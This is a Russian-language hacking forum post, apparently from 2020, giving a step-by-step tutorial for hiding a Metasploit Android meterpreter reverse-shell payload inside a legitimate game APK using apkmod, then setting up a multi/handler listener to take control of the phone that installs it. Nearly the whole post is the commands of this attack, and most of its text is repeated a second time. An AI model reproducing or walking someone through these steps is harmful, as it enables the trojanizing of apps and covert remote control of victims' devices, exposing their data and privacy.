seedkls
29.10.2020, 17:04
Всем привет! в данной статье я расскажу как забиндить к .apk файлу метерпретер при помощи apkmod
Нам понадобится: .apk к которому клеем, metasploit и apkmod.
Установка apkmod:
Сначало нужно скачать установщик.
Код:
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
https://forum.antichat.xyz/attachments/4893988/img_5091036fb7.png
Затем пишем
Код:
sh setup.sh
ждем окончания установки
Бинд:
Для примера я буду использовать игру Geometry Dash(для удобности переименовал в Geome.apk)
Код:
apkmod -b Geome.apk -o GeometryDash.apk LHOST=192.168.100.3 LPORT=4444
-b : файл к которому клеем пейлод
-o : выходной файл с пейлодом
P.S: это зависит от apk файла к которому биндите
Теперь переходим к Metasploit:
Код:
msfconsole
Используем multi/handler:
Код:
use exploit/multi/handler
Ставим пейлод под Android:
Код:
set payload android/meterpreter/reverse_tcp
Прописываем наш IP и Порт:
Код:
set LHOST 192.168.100.3
Код:
set LPORT 4444
Запускаем:
Код:
exploit
https://forum.antichat.xyz/attachments/4893988/img_4643a01eb1.png
Теперь скидываем себе на телефон и смотрим на результат:
https://forum.antichat.xyz/attachments/4893988/img_9af35ccf0d.png
На этом моя статья заканчивается.
Всем пока!
Нам понадобится: .apk к которому клеем, metasploit и apkmod.
Установка apkmod:
Сначало нужно скачать установщик.
Код:
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
https://forum.antichat.xyz/attachments/4893988/img_5091036fb7.png
Затем пишем
Код:
sh setup.sh
ждем окончания установки
Бинд:
Для примера я буду использовать игру Geometry Dash(для удобности переименовал в Geome.apk)
Код:
apkmod -b Geome.apk -o GeometryDash.apk LHOST=192.168.100.3 LPORT=4444
-b : файл к которому клеем пейлод
-o : выходной файл с пейлодом
P.S: это зависит от apk файла к которому биндите
Теперь переходим к Metasploit:
Код:
msfconsole
Используем multi/handler:
Код:
use exploit/multi/handler
Ставим пейлод под Android:
Код:
set payload android/meterpreter/reverse_tcp
Прописываем наш IP и Порт:
Код:
set LHOST 192.168.100.3
Код:
set LPORT 4444
Запускаем:
Код:
exploit
https://forum.antichat.xyz/attachments/4893988/img_4643a01eb1.png
Теперь скидываем себе на телефон и смотрим на результат:
https://forum.antichat.xyz/attachments/4893988/img_9af35ccf0d.png
На этом моя статья заканчивается.
Всем пока!